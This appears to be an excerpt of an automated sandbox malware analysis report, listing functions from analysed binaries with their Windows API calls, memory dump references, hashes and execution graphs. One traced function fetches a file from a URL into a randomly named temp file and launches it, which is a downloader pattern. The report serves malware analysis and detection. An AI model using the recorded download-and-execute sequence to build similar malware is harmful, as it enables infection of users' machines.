                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ioctlsocket.WS2_32 ref: 0040112B
                                                                                                                    • recvfrom.WS2_32 ref: 0040119C
                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004011B2
                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 004011D3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3980219359-0
                                                                                                                    • Opcode ID: 9043bbde74ed34bf2cc191a38aea973bc9bd065bac7bbf52c4b9ffe402cd0893
                                                                                                                    • Instruction ID: e1641215121ef27e00d374ead4771de002ae7678dd3977a0c2b5eb1dd4af8410
                                                                                                                    • Opcode Fuzzy Hash: 9043bbde74ed34bf2cc191a38aea973bc9bd065bac7bbf52c4b9ffe402cd0893
                                                                                                                    • Instruction Fuzzy Hash: BE21B1B11043016FD304DF65D884A6BB7E8AF88318F004A3EF559A6291E774D948C7AA
                                                                                                                    Function 00401F50 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401F83
                                                                                                                    • WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 00401FAF
                                                                                                                    • WSAGetLastError.WS2_32 ref: 00401FB9
                                                                                                                    • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401FF9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2074799992-0
                                                                                                                    • Opcode ID: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
                                                                                                                    • Instruction ID: 923efa3f85c100d8dcf87aa4bb405070ff806fabc372267044aefe38fa55a991
                                                                                                                    • Opcode Fuzzy Hash: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
                                                                                                                    • Instruction Fuzzy Hash: B72131715083119BC200DF55D844D6BB7E8BFCCB54F044A2DF598A3291D774EA49CBAA
                                                                                                                    Function 00401C50 Relevance: 6.1, APIs: 4, Instructions: 59networksleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401C88
                                                                                                                    • WSAGetLastError.WS2_32(?,?,004021A5,00000000), ref: 00401C90
                                                                                                                    • Sleep.KERNEL32(00000001,?,?,004021A5,00000000), ref: 00401CA6
                                                                                                                    • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401CCC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Recv$ErrorLastSleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3668019968-0
                                                                                                                    • Opcode ID: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
                                                                                                                    • Instruction ID: 470b9b0004fc9485880b3b0232d8394a6163a25caab740c915041083b8486df8
                                                                                                                    • Opcode Fuzzy Hash: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
                                                                                                                    • Instruction Fuzzy Hash: 8811AD72148305AFD310CF65EC84AEBB7ECEB88710F40092EF945D2150E6B9E949A7B6
                                                                                                                    Function 00401AE0 Relevance: 6.0, APIs: 4, Instructions: 49networksleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B0C
                                                                                                                    • WSAGetLastError.WS2_32 ref: 00401B12
                                                                                                                    • Sleep.KERNEL32(00000001), ref: 00401B28
                                                                                                                    • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B4A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Send$ErrorLastSleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2121970615-0
                                                                                                                    • Opcode ID: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
                                                                                                                    • Instruction ID: 56798eeddd779857b304cdb020dc52eae5646efd672cabe94dca1e5c1b4e91c2
                                                                                                                    • Opcode Fuzzy Hash: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
                                                                                                                    • Instruction Fuzzy Hash: 90014B712483046EE7209B96DC88F9B77A8EBC8711F408429F608DA2D0D7B5A9459B7A
                                                                                                                    Function 0040D410 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 0040D429
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040D458
                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0040D467
                                                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 0040D474
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection$CloseDeleteEnterHandleLeave
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3102160386-0
                                                                                                                    • Opcode ID: 8282c1fc67bed24bc2a31477c864fcafb026bcbe456c45579f2b949671041cbb
                                                                                                                    • Instruction ID: 6cfc4b79706d1bba1c4fbc1f32f5c608acb329628ab24e105d00911b1e03cc11
                                                                                                                    • Opcode Fuzzy Hash: 8282c1fc67bed24bc2a31477c864fcafb026bcbe456c45579f2b949671041cbb
                                                                                                                    • Instruction Fuzzy Hash: AC112D74D00208EFDB08DF94D984A9EBB75FF48309F2081A9E806AB341D734EE95DB95
                                                                                                                    Function 004017A0 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 00401808
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2223660684-0
                                                                                                                    • Opcode ID: 7e6606f5c14d1b9ede2abea3a5762152510b51c5bdf13f408023d0105cc90a62
                                                                                                                    • Instruction ID: 0184f799374b3cbd514a588550e5351e3808897b1395f0a2de410330185c2ead
                                                                                                                    • Opcode Fuzzy Hash: 7e6606f5c14d1b9ede2abea3a5762152510b51c5bdf13f408023d0105cc90a62
                                                                                                                    • Instruction Fuzzy Hash: DF01F7352423009FC3209F26EC44ADB77E8AF49711F04443EE80697650EB34E545DB28
                                                                                                                    Function 00406FE0 Relevance: 6.0, APIs: 4, Instructions: 22memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CoInitializeEx.OLE32(00000000,00000002,?,?,00407A2A), ref: 00406FE8
                                                                                                                    • SysAllocString.OLEAUT32(00416268), ref: 00406FF3
                                                                                                                    • CoUninitialize.OLE32 ref: 00407018
                                                                                                                      • Part of subcall function 00407030: SysFreeString.OLEAUT32(00000000), ref: 00407248
                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00407012
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: String$Free$AllocInitializeUninitialize
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 459949847-0
                                                                                                                    • Opcode ID: 8c6e8e85228af4463c2c4705a75977d25c0b83143a75c32acd5627430c5b3515
                                                                                                                    • Instruction ID: 74c6c169e6652ce6f6b7715e91ddbb7e77275cafe0f94b55a583b47f3cb3299b
                                                                                                                    • Opcode Fuzzy Hash: 8c6e8e85228af4463c2c4705a75977d25c0b83143a75c32acd5627430c5b3515
                                                                                                                    • Instruction Fuzzy Hash: 13E01275D44208FBD704AFA0DD0EB9D77789B05341F1081A5F905922A0DAF95E80DB56
                                                                                                                    Function 00407030 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 238COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 004072C0: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 004072E0
                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00407248
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFreeInstanceString
                                                                                                                    • String ID: Microsoft Corporation
                                                                                                                    • API String ID: 586785272-3838278685
                                                                                                                    • Opcode ID: 2f3cc9baeef0c7a1245b843303fd4ce0e44c974243be678b414a87c4b8a79f3c
                                                                                                                    • Instruction ID: 457fc6c08a50d419230b37d5b6ce52bdab008108e04107557a49afcd29d8ec7c
                                                                                                                    • Opcode Fuzzy Hash: 2f3cc9baeef0c7a1245b843303fd4ce0e44c974243be678b414a87c4b8a79f3c
                                                                                                                    • Instruction Fuzzy Hash: 4491FC75E0410ADFCB04DB94D890AAFB7B5BF48304F2081A9E515B73E4D734AE82CB66
                                                                                                                    Function 0040D980 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0040DBC0: memset.NTDLL ref: 0040DBE8
                                                                                                                      • Part of subcall function 0040DBC0: InternetCrackUrlA.WININET(0040D699,00000000,10000000,0000003C), ref: 0040DC38
                                                                                                                      • Part of subcall function 0040DBC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040DC48
                                                                                                                      • Part of subcall function 0040DBC0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040DC81
                                                                                                                      • Part of subcall function 0040DBC0: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040DCB7
                                                                                                                      • Part of subcall function 0040DBC0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040DCDF
                                                                                                                      • Part of subcall function 0040DBC0: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040DD28
                                                                                                                      • Part of subcall function 0040DBC0: InternetCloseHandle.WININET(00000000), ref: 0040DDB7
                                                                                                                      • Part of subcall function 0040DAB0: SysAllocString.OLEAUT32(00000000), ref: 0040DADE
                                                                                                                      • Part of subcall function 0040DAB0: CoCreateInstance.OLE32(00412408,00000000,00004401,004123F8,00000000), ref: 0040DB06
                                                                                                                      • Part of subcall function 0040DAB0: SysFreeString.OLEAUT32(00000000), ref: 0040DBA1
                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040DA5B
                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040DA65
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
                                                                                                                    • String ID: %S%S
                                                                                                                    • API String ID: 1017111014-3267608656
                                                                                                                    • Opcode ID: 2a44cf61d891e8738e9fac40afdb9ff2254c365f5810798eb153ce2e68fa7b5b
                                                                                                                    • Instruction ID: beec9ad9f3848cf7af9d47610756df11a49d132dd1bd9a4578eda8885410465d
                                                                                                                    • Opcode Fuzzy Hash: 2a44cf61d891e8738e9fac40afdb9ff2254c365f5810798eb153ce2e68fa7b5b
                                                                                                                    • Instruction Fuzzy Hash: 4941E6B5E002099FCB04DBE4C885AEFB7B9BF48304F148569E505B7391D738AA85CFA5
                                                                                                                    Function 0040D640 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CoInitializeEx.OLE32(00000000,00000002,?,?,?,00407A25), ref: 0040D64A
                                                                                                                      • Part of subcall function 0040D710: socket.WS2_32(00000002,00000002,00000011), ref: 0040D72A
                                                                                                                      • Part of subcall function 0040D710: htons.WS2_32(0000076C), ref: 0040D760
                                                                                                                      • Part of subcall function 0040D710: inet_addr.WS2_32(239.255.255.250), ref: 0040D76F
                                                                                                                      • Part of subcall function 0040D710: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040D78D
                                                                                                                      • Part of subcall function 0040D710: bind.WS2_32(000000FF,?,00000010), ref: 0040D7C3
                                                                                                                      • Part of subcall function 0040D710: lstrlenA.KERNEL32(00411760,00000000,?,00000010), ref: 0040D7DC
                                                                                                                      • Part of subcall function 0040D710: sendto.WS2_32(000000FF,00411760,00000000), ref: 0040D7EB
                                                                                                                      • Part of subcall function 0040D710: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040D805
                                                                                                                      • Part of subcall function 0040D980: SysFreeString.OLEAUT32(00000000), ref: 0040DA5B
                                                                                                                      • Part of subcall function 0040D980: SysFreeString.OLEAUT32(00000000), ref: 0040DA65
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
                                                                                                                    • String ID: TCP$UDP
                                                                                                                    • API String ID: 1519345861-1097902612
                                                                                                                    • Opcode ID: e7e0460ef37b7f5a634b859c329effc3c57a24fdb8b35e9f857aa09b9315b4ce
                                                                                                                    • Instruction ID: b9d850b43d5b9198a526a111fa4c70c7537d99c61ef063864e94ee7d89292dcb
                                                                                                                    • Opcode Fuzzy Hash: e7e0460ef37b7f5a634b859c329effc3c57a24fdb8b35e9f857aa09b9315b4ce
                                                                                                                    • Instruction Fuzzy Hash: A91181B4D01208EBDB00EBD4D945FEE7374AB44308F1089BAE505772C2D7799E58CB9A
                                                                                                                    Function 00405EB0 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • EnterCriticalSection.KERNEL32(00415E30,?,?,?), ref: 00405EBF
                                                                                                                    • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405EFE
                                                                                                                    • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405F73
                                                                                                                    • LeaveCriticalSection.KERNEL32(00415E30), ref: 00405F90
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1820130859.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.1820111304.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820149399.0000000000410000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.1820170831.0000000000414000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_400000_sysnldcvmr.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSectionmemcpy$EnterLeave
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 469056452-0
                                                                                                                    • Opcode ID: 11a0381e7cc2a19f3e704b5167a0aa4c73886e0f3014e3589bcc626491d58d19
                                                                                                                    • Instruction ID: 4abcbf5e8f17672ba879e37304839ab4c0f114d9c1813139277d8bca2654c775
                                                                                                                    • Opcode Fuzzy Hash: 11a0381e7cc2a19f3e704b5167a0aa4c73886e0f3014e3589bcc626491d58d19
                                                                                                                    • Instruction Fuzzy Hash: 71217C35D04609EBCB04DF94D985BDEBBB1EB48304F1481AAE80567281D37CAA95CF9A

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:26.1%
                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                    Signature Coverage:0%
                                                                                                                    Total number of Nodes:3
                                                                                                                    Total number of Limit Nodes:0

                                                                                                                    Callgraph

                                                                                                                    Executed Functions

                                                                                                                    Function 00007FFD9BAC0F11 Relevance: 1.6, APIs: 1, Instructions: 124nativeCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000003.00000002.1836180871.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_3_2_7ffd9bac0000_1224321169.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InformationQuerySystem
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3562636166-0
                                                                                                                    • Opcode ID: 5f97f352df56d657dcac81a9891b678fa0839ef0974298332e55d0b66f6f7abc
                                                                                                                    • Instruction ID: 3c7483854f7f2b9f963d783e78a284a8f9d38348d2e4e2979dc815f8afb56df7
                                                                                                                    • Opcode Fuzzy Hash: 5f97f352df56d657dcac81a9891b678fa0839ef0974298332e55d0b66f6f7abc
                                                                                                                    • Instruction Fuzzy Hash: BC31F63090CA4C9FDB18DF9CD845AF9BBF1EB56325F00426FD059D3252CB606846CB81

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:37%
                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                    Signature Coverage:7.6%
                                                                                                                    Total number of Nodes:92
                                                                                                                    Total number of Limit Nodes:4
                                                                                                                    execution_graph 310 d91c08 IsDebuggerPresent _crt_debugger_hook SetUnhandledExceptionFilter UnhandledExceptionFilter 311 d91cfa GetCurrentProcess TerminateProcess 310->311 312 d91cf2 _crt_debugger_hook 310->312 312->311 272 d91671 _XcptFilter 273 d914b1 278 d918bd 273->278 276 d914ee _amsg_exit 277 d914f6 276->277 281 d91818 278->281 280 d914b6 __getmainargs 280->276 280->277 288 d91a8c 281->288 283 d91824 _decode_pointer 284 d9183b _onexit 283->284 285 d91847 7 API calls 283->285 286 d918ab __onexit 284->286 289 d918b4 _unlock 285->289 286->280 288->283 289->286 313 d917c1 314 d917fd 313->314 316 d917d3 313->316 315 d917f8 ?terminate@ 315->314 316->314 316->315 317 d91685 318 d91699 _exit 317->318 319 d916a0 317->319 318->319 320 d916a9 _cexit 319->320 321 d916af __onexit 319->321 320->321 322 d91ae5 _except_handler4_common 213 d914f7 234 d91a8c 213->234 215 d91503 GetStartupInfoA 216 d91531 InterlockedCompareExchange 215->216 217 d9153f 216->217 218 d91543 216->218 217->218 219 d9154a Sleep 217->219 220 d9156d 218->220 221 d91563 _amsg_exit 218->221 219->216 222 d91596 220->222 223 d91576 _initterm_e 220->223 221->222 224 d915c0 222->224 225 d915a5 _initterm 222->225 223->222 227 d91591 __onexit 223->227 226 d915c4 InterlockedExchange 224->226 229 d915cc __IsNonwritableInCurrentImage 224->229 225->224 226->229 228 d9165b _ismbblead 228->229 229->228 230 d916a0 229->230 233 d91645 exit 229->233 235 d91460 Sleep 229->235 230->227 231 d916a9 _cexit 230->231 231->227 233->229 234->215 242 d91360 ExpandEnvironmentStringsW wsprintfW PathFileExistsW 235->242 241 d91490 241->229 243 d913ad 242->243 243->241 244 d913c0 ExpandEnvironmentStringsW wsprintfW PathFileExistsW 243->244 245 d9140d 244->245 246 d91413 CreateFileW 244->246 245->241 248 d910b0 8 API calls 245->248 246->245 247 d9143e CloseHandle 246->247 247->245 249 d9115a InternetOpenUrlW 248->249 250 d91276 InternetCloseHandle Sleep 248->250 251 d91269 InternetCloseHandle 249->251 252 d91186 CreateFileW 249->252 253 d9135a 250->253 254 d9129d 7 API calls 250->254 251->250 255 d9125c CloseHandle 252->255 256 d911b5 InternetReadFile 252->256 253->241 254->253 257 d91322 wsprintfW DeleteFileW 254->257 255->251 258 d911d9 256->258 259 d91208 CloseHandle wsprintfW DeleteFileW 256->259 260 d91000 6 API calls 257->260 258->259 261 d911e2 WriteFile 258->261 266 d91000 memset memset CreateProcessW 259->266 263 d91357 260->263 261->256 263->253 265 d91255 265->255 267 d91071 ShellExecuteW 266->267 268 d91062 Sleep 266->268 269 d91097 Sleep 267->269 270 d910a6 267->270 271 d910a8 268->271 269->271 270->271 271->255 271->265 290 d917b7 293 d91b38 290->293 292 d917bc 292->292 294 d91b6a GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 293->294 295 d91b5d 293->295 296 d91b61 294->296 295->294 295->296 296->292 297 d916d6 300 d916e4 __set_app_type _encode_pointer __p__fmode __p__commode 297->300 299 d91783 _pre_c_init __RTC_Initialize 301 d9179d 299->301 302 d91791 __setusermatherr 299->302 300->299 307 d91b0a _controlfp_s 301->307 302->301 305 d917ab _configthreadlocale 306 d917b4 305->306 308 d917a2 307->308 309 d91b26 _invoke_watson 307->309 308->305 308->306 309->308

                                                                                                                    Callgraph

                                                                                                                    Executed Functions

                                                                                                                    Function 00D910B0 Relevance: 59.7, APIs: 28, Strings: 6, Instructions: 183filenetworksleepCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • GetTickCount.KERNEL32 ref: 00D910B9
                                                                                                                    • srand.MSVCR90 ref: 00D910C0
                                                                                                                    • DeleteUrlCacheEntryW.WININET(?), ref: 00D910CC
                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 00D910EA
                                                                                                                    • rand.MSVCR90 ref: 00D910F0
                                                                                                                    • rand.MSVCR90 ref: 00D91104
                                                                                                                    • wsprintfW.USER32 ref: 00D9112B
                                                                                                                    • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00D91141
                                                                                                                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00D9116D
                                                                                                                    • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00D9119C
                                                                                                                    • InternetReadFile.WININET(00000000,?,00000103,?), ref: 00D911CF
                                                                                                                    • WriteFile.KERNELBASE(000000FF,?,00000000,?,00000000), ref: 00D91200
                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 00D9120F
                                                                                                                    • wsprintfW.USER32 ref: 00D91228
                                                                                                                    • DeleteFileW.KERNELBASE(?), ref: 00D91238
                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 00D91263
                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00D91270
                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00D9127D
                                                                                                                    • Sleep.KERNELBASE(000001F4), ref: 00D91288
                                                                                                                    • rand.MSVCR90 ref: 00D9129D
                                                                                                                    • Sleep.KERNEL32 ref: 00D912B4
                                                                                                                    • rand.MSVCR90 ref: 00D912BA
                                                                                                                    • rand.MSVCR90 ref: 00D912CE
                                                                                                                    • wsprintfW.USER32 ref: 00D912F5
                                                                                                                    • DeleteUrlCacheEntryW.WININET(?), ref: 00D91302
                                                                                                                    • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 00D91319
                                                                                                                    • wsprintfW.USER32 ref: 00D91335
